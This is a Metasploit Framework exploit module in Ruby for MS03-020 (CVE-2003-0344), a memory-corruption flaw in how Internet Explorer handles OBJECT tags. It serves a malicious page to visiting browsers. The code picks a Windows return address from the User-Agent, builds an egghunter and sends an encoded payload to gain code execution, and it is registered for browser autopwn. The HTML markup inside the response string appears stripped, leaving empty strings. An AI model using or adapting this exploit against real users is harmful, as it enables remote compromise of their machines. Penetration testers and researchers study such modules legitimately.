## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :javascript => false, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, # no way to test without just trying it :prefix_html => "", :rank => NormalRanking # reliable memory corruption }) def initialize(info = {}) super(update_info(info, 'Name' => 'MS03-020 Internet Explorer Object Type', 'Description' => %q{ This module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute. }, 'Author' => 'skape', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0344' ], [ 'OSVDB', '2967' ], [ 'BID', '7806' ], [ 'MSB', 'MS03-020' ], ], 'Payload' => { 'Space' => 1000, 'MaxNops' => 0, 'BadChars' => "\x8b\xe2", # Prevent UTF-8-ification 'StackAdjustment' => -3500, }, 'Targets' => [ # Target 0: Automatic [ 'Windows NT/XP/2003 Automatic', { 'Platform' => 'win', 'Rets' => [ 0x777e85ab, # Windows NT: samlib jmp esp 0x71ab1d54, # Windows XP: ws2_32 push esp/ret SP0/1 0x77d1f92f, # Windows 2003: user32 jmp esp SP0/1 ], }, ], ], 'DefaultTarget' => 0)) end def on_request_uri(cli, request) clean = 0x7ffdec50 ret = nil # Figure out which return address to use based on the user-agent case request['User-Agent'] when /Windows NT 5.2/ ret = target['Rets'][2] when /Windows NT 5.1/ ret = target['Rets'][1] when /Windows NT/ ret = target['Rets'][0] else print_status("Sending 404 to user agent: #{request['User-Agent']}") cli.send_response(create_response(404, 'File not found')) return end # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Pack the values ret = [ ret ].pack('V') clean = [ clean ].pack('V') hunter = generate_egghunter() egg = hunter[1] # Now, build out the HTTP response payload content = "" + egg + egg + p.encoded + "\n" + "" + "" + "" print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end